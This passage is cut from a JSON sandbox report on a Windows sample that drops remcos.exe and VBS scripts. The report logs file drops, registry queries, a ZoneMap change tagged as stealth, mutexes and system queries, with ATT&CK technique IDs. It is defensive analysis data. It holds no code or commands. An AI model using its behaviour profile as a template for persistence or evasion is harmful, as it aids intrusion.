"https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"hab.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\hab.exe]- [targetUID: 00000000-00005392]\n \"remcos.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%APPDATA%\\remcos\\remcos.exe]- [targetUID: 00000000-00006020]\n \"install.vbs\" has type \"data\"- Location: [%TEMP%\\install.vbs]- [targetUID: 00000000-00005392]\n \"hab.vbs\" has type \"ASCII text with CRLF line terminators\"- Location: [%TEMP%\\hab.vbs]- [targetUID: 00000000-00004744]\n \"win.ini\" has type \"data\"- Location: [%WINDIR%\\win.ini]- [targetUID: 00000000-00006020]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" touched file \"C:\\Windows\\win.ini\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"\n \"hab.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"hab.exe\" touched file \"C:\\Windows\\win.ini\"\n \"hab.exe\" touched file \"C:\\Windows\\System32\\en\\WScript.exe.mui\"\n \"hab.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"hab.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"\n \"WScript.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"WScript.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"\n \"cmd.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"remcos.exe\" touched file \"C:\\Windows\\win.ini\"\n \"remcos.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"remcos.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"remcos.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\DLLNXOPTIONS\"; Key: \"USEFILTER\"; Value: \"\")\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\DLLNXOPTIONS\"; Key: \"MSVBVM60.DLL\"; Value: \"\")\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"02BDDBF5EA7BE0C240F6F4FCE6784938E6DD4339F29A65E1E87AADE246CAD859\"; Value: \"\")\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\"; Value: \"\")\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\"; Value: \"\")\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\"; Value: \"\")\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\"; Value: \"\")\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")\n \"hab.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")\n \"WScript.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")\n \"remcos.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-140", "type": 6, "relevance": 3, "name": "Calls an API typically used to find a resource in a module", "description": "\"hab.exe\" called \"FindResourceA\" with parameter \"4282192\" - (UID: 00000000-00004488)\n \"hab.exe\" called \"FindResourceA\" with parameter \"4282192\" - (UID: 00000000-00004300)\n \"hab.exe\" called \"FindResourceA\" with parameter \"4282192\" - (UID: 00000000-00006020)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4579560'}\" (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4579576'}\" (UID: 00000000-00004744)\n \"hab.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4579560'}\" (UID: 00000000-00003504)\n \"hab.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4579576'}\" (UID: 00000000-00003504)\n \"hab.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4579560'}\" (UID: 00000000-00004488)\n \"hab.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4579576'}\" (UID: 00000000-00004488)\n \"hab.exe\" called \"LoadResource with parameter {'hModule': '0', 'hResInfo': '4309192'}\" (UID: 00000000-00004488)\n \"remcos.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4579560'}\" (UID: 00000000-00005488)\n \"remcos.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4579576'}\" (UID: 00000000-00005488)\n \"remcos.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4579560'}\" (UID: 00000000-00005656)\n \"remcos.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4579576'}\" (UID: 00000000-00005656)\n \"hab.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4579560'}\" (UID: 00000000-00005744)\n \"hab.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4579576'}\" (UID: 00000000-00005744)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-39", "type": 6, "relevance": 8, "name": "Queries volume information of an entire harddrive", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" queries volume information of \"C:\\\" at 00000000-00004836-0000010C-1081915\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" queries volume information of \"C:\\\" at 00000000-00004836-0000010C-1097685\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" queries volume information of \"C:\\\" at 00000000-00004836-0000010C-1113186\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" queries volume information of \"C:\\\" at 00000000-00004836-0000010C-1120024\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" queries volume information of \"C:\\\" at 00000000-00004744-0000010C-2393943\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" queries volume information of \"C:\\\" at 00000000-00004744-0000010C-2408420\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" queries volume information of \"C:\\\" at 00000000-00004744-0000010C-2421869\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" queries volume information of \"C:\\\" at 00000000-00004744-0000010C-2428647\n \"hab.exe\" queries volume information of \"C:\\\" at 00000000-00003504-0000010C-1031888\n \"hab.exe\" queries volume information of \"C:\\\" at 00000000-00003504-0000010C-1044096\n \"hab.exe\" queries volume information of \"C:\\\" at 00000000-00003504-0000010C-1056317\n \"hab.exe\" queries volume information of \"C:\\\" at 00000000-00003504-0000010C-1062515\n \"hab.exe\" queries volume information of \"C:\\\" at 00000000-00004488-0000010C-926875\n \"hab.exe\" queries volume information of \"C:\\\" at 00000000-00004488-0000010C-943284\n \"hab.exe\" queries volume information of \"C:\\\" at 00000000-00004488-0000010C-957512\n \"hab.exe\" queries volume information of \"C:\\\" at 00000000-00004488-0000010C-964739\n \"remcos.exe\" queries volume information of \"C:\\\" at 00000000-00005488-0000010C-802193\n \"remcos.exe\" queries volume information of \"C:\\\" at 00000000-00005488-0000010C-814897\n \"remcos.exe\" queries volume information of \"C:\\\" at 00000000-00005488-0000010C-827415\n \"remcos.exe\" queries volume information of \"C:\\\" at 00000000-00005488-0000010C-834450\n \"remcos.exe\" queries volume information of \"C:\\\" at 00000000-00005656-0000010C-1186419\n \"remcos.exe\" queries volume information of \"C:\\\" at 00000000-00005656-0000010C-1203430\n \"remcos.exe\" queries volume information of \"C:\\\" at 00000000-00005656-0000010C-1218309\n \"remcos.exe\" queries volume information of \"C:\\\" at 00000000-00005656-0000010C-1226289\n \"hab.exe\" queries volume information of \"C:\\\" at 00000000-00005744-0000010C-1860501", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-144", "type": 6, "relevance": 3, "name": "Calls an API typically used to open an existing named mutex object", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"OpenMutexW\" with parameter \"Local\\MSCTF.Asm.MutexDefault1\" - (UID: 00000000-00004836)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"OpenMutexW\" with parameter \"Local\\MSCTF.Asm.MutexDefault1\" - (UID: 00000000-00004744)\n \"hab.exe\" called \"OpenMutexW\" with parameter \"Local\\MSCTF.Asm.MutexDefault1\" - (UID: 00000000-00003504)\n \"hab.exe\" called \"OpenMutexW\" with parameter \"Local\\MSCTF.Asm.MutexDefault1\" - (UID: 00000000-00004488)\n \"hab.exe\" called \"OpenMutexA\" with parameter \"Remcos_Mutex_Inj\" - (UID: 00000000-00004488)\n \"remcos.exe\" called \"OpenMutexW\" with parameter \"Local\\MSCTF.Asm.MutexDefault1\" - (UID: 00000000-00005488)\n \"remcos.exe\" called \"OpenMutexW\" with parameter \"Local\\MSCTF.Asm.MutexDefault1\" - (UID: 00000000-00005656)\n \"hab.exe\" called \"OpenMutexW\" with parameter \"Local\\MSCTF.Asm.MutexDefault1\" - (UID: 00000000-00005744)\n \"hab.exe\" called \"OpenMutexW\" with parameter \"Local\\MSCTF.Asm.MutexDefault1\" - (UID: 00000000-00004300)\n \"hab.exe\" called \"OpenMutexA\" with parameter \"Remcos_Mutex_Inj\" - (UID: 00000000-00004300)\n \"remcos.exe\" called \"OpenMutexW\" with parameter \"Local\\MSCTF.Asm.MutexDefault1\" - (UID: 00000000-00005944)\n \"remcos.exe\" called \"OpenMutexW\" with parameter \"Local\\MSCTF.Asm.MutexDefault1\" - (UID: 00000000-00003476)\n \"hab.exe\" called \"OpenMutexW\" with parameter \"Local\\MSCTF.Asm.MutexDefault1\" - (UID: 00000000-00003996)\n \"hab.exe\" called \"OpenMutexW\" with parameter \"Local\\MSCTF.Asm.MutexDefault1\" - (UID: 00000000-00006020)\n \"hab.exe\" called \"OpenMutexA\" with parameter \"Remcos_Mutex_Inj\" - (UID: 00000000-00006020)\n \"remcos.exe\" called \"OpenMutexW\" with parameter \"Local\\MSCTF.Asm.MutexDefault1\" - (UID: 00000000-00002916)\n \"remcos.exe\" called \"OpenMutexW\" with parameter \"Local\\MSCTF.Asm.MutexDefault1\" - (UID: 00000000-00002208)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-150", "type": 6, "relevance": 5, "name": "Calls an API typically used to get handle of currently active window", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"GetActiveWindow\" (UID: 00000000-00004836)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"GetActiveWindow\" (UID: 00000000-00004744)\n \"hab.exe\" called \"GetActiveWindow\" (UID: 00000000-00003504)\n \"hab.exe\" called \"GetActiveWindow\" (UID: 00000000-00004488)\n \"remcos.exe\" called \"GetActiveWindow\" (UID: 00000000-00005488)\n \"remcos.exe\" called \"GetActiveWindow\" (UID: 00000000-00005656)\n \"hab.exe\" called \"GetActiveWindow\" (UID: 00000000-00005744)\n \"hab.exe\" called \"GetActiveWindow\" (UID: 00000000-00004300)\n \"remcos.exe\" called \"GetActiveWindow\" (UID: 00000000-00005944)\n \"remcos.exe\" called \"GetActiveWindow\" (UID: 00000000-00003476)\n \"hab.exe\" called \"GetActiveWindow\" (UID: 00000000-00003996)\n \"hab.exe\" called \"GetActiveWindow\" (UID: 00000000-00006020)\n \"remcos.exe\" called \"GetActiveWindow\" (UID: 00000000-00002916)\n \"remcos.exe\" called \"GetActiveWindow\" (UID: 00000000-00002208)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010004000000000000000000 (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100765059e87698010000000000000000000010fb120008f9ce010000ce01dcf7ce01feffffffde64ef7627a1eb760000ce016b010050435ce876000000000000ce01000000000000ce01000000006a00004000000000000000000000000064fb120000000000000000000000ce0162000040 (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000400000000000000d8eb3975003e1c0000f0fd7f9a5ce97600e0fd7f58c0120044f0fd7f00000000400000003f0000002000000000f0fd7f4cc01200c15ce9766082f0762000000000f0fd7f9a5ce97600e0fd7f70c012005789e8768083f0761317df74d8eb3975 (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004744)\n \"hab.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010004000000000000000000 (UID: 00000000-00003504)\n \"hab.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100765059e87698010000a00100003a574e0138574e01704e4e0100004b01544d4e0188000000880000001768e87600534e01ff2be8766b0afc760c574e01ac0128000000280000004b01f8624b010d00bb00d1040000f8624b01b8514e0110000000000000000e00b600d1040000f8624b01 (UID: 00000000-00003504)\n \"hab.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100765059e87698010000000000000000000010fb120008f9ba010000ba01dcf7ba01feffffffde64ef7627a1eb760000ba016b010050435ce876000000000000ba01000000000000ba01000000006a00004000000000000000000000000064fb120000000000000000000000ba0162000040 (UID: 00000000-00004488)\n \"hab.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004488)\n \"hab.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000400000000000000d8eb3975f09e650000d0fd7f9a5ce97600f0fd7fd0cb120044d0fd7f00000000400000003f0000002500000000d0fd7fc4cb1200c15ce9766082f0762500000000d0fd7f9a5ce97600f0fd7fe8cb12005789e8768083f0761317df74d8eb3975 (UID: 00000000-00004488)\n \"hab.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004488)\n \"WScript.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100003cf3380044f338003a17df740000000000000000f0f338000200000000000000000000000c0000000200000001013800c2eb7375ec5be7764da0de7420020000fc57e7760a9fde7430010000ffffffff8cf33800000000000000000070f3380088f33800010000000000000002000000 (UID: 00000000-00005392)\n \"WScript.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000095e1e4761b7e0600fefffffff5f6e876634de97690a24e001015636c88086300b2f4e8767f9fd676e4e938000000626c0000626c804de9765b9fd676f0000000f000626c0000000050e938005c004300e4ea38000000000001000000b4e9380040f5e8760000000000000000a0e93800 (UID: 00000000-00005392)\n \"WScript.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000440651000100010040e6457610e9380010e938002459e9760000000068e8457600574f00000000001100000038e93800575ae97600000000030000000200000000000000880000000100000050e93800459dfe750000070000000000800000000200000000003900dc1a626c64e93800 (UID: 00000000-00005392)\n \"WScript.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000283fa06b08000000fa3ea06b59a7902e020000006842a06b000039002f18a06bd8a00700d0a00700a8d938006842a06b68da3800ce85a16b85410845fefffffffa3ea06b783ea06b2f18a06bfcd938001e3ea06b2f18a06b67c1fe754460a26b18da38004642a06b4460a26b00000000 (UID: 00000000-00005392)\n \"WScript.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000f01a316b08000000c41a316be1701ffb02000000d41c316b00003900e616316bf0a10700e0a1070040db3800d0f0326b00dc380053af326b5db11690feffffffc41a316b421a316be616316b94db3800d91b316be616316b67c1fe75ae05e2747457e2740000000000000000cc92de74 (UID: 00000000-00005392)\n \"WScript.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310076e36a0600feffffffff2be8769a2ae876f0f04971f0f0497100000000bcf04971b69fe876000000000000000068f14971c836510068f14971000000000200000000000000880000001881f07680db3800459dfe7500000700000000008000000002000000000039009813066b94db3800 (UID: 00000000-00005392)\n \"WScript.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005392)\n \"WScript.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb39756859520000b0fd7f9a5ce9760090fd7f78c3840244b0fd7f00000000400000003f0000002800000000b0fd7f6cc38402c15ce9766082f0762800000000b0fd7f9a5ce9760090fd7f90c384025789e8768083f0761317df74d8eb3975 (UID: 00000000-00005392)\n \"remcos.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100765059e87698010000a00100003a57e0013857e001704ee0010000dd01544de00188000000880000001768e8760053e001ff2be876857efd760c57e001ac012600000026000000dd01f862dd010d00bb0066050000f862dd01b851e00110000000000000000e00b60066050000f862dd01 (UID: 00000000-00005488)\n \"remcos.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010004000000000000000000 (UID: 00000000-00005656)\n \"remcos.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100765059e87698010000000000000000000010fb120008f9f4010000f401dcf7f401feffffffde64ef7627a1eb760000f4016b010050435ce876000000000000f401000000000000f401000000006a00004000000000000000000000000064fb120000000000000000000000f40162000040 (UID: 00000000-00005656)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" queries volume information of \"C:\\\" at 00000000-00004836-0000010C-1081915\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" queries volume information of \"C:\\share\" at 00000000-00004836-0000010C-1083504\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" queries volume information of \"C:\\\" at 00000000-00004836-0000010C-1097685\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" queries volume information of \"C:\\share\" at 00000000-00004836-0000010C-1099208\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" queries volume information of \"C:\\\" at 00000000-00004836-0000010C-1113186\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" queries volume information of \"C:\\share\" at 00000000-00004836-0000010C-1114700\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" queries volume information of \"C:\\\" at 00000000-00004836-0000010C-1120024\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" queries volume information of \"C:\\share\" at 00000000-00004836-0000010C-1120842\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" queries volume information of \"C:\\\" at 00000000-00004744-0000010C-2393943\n 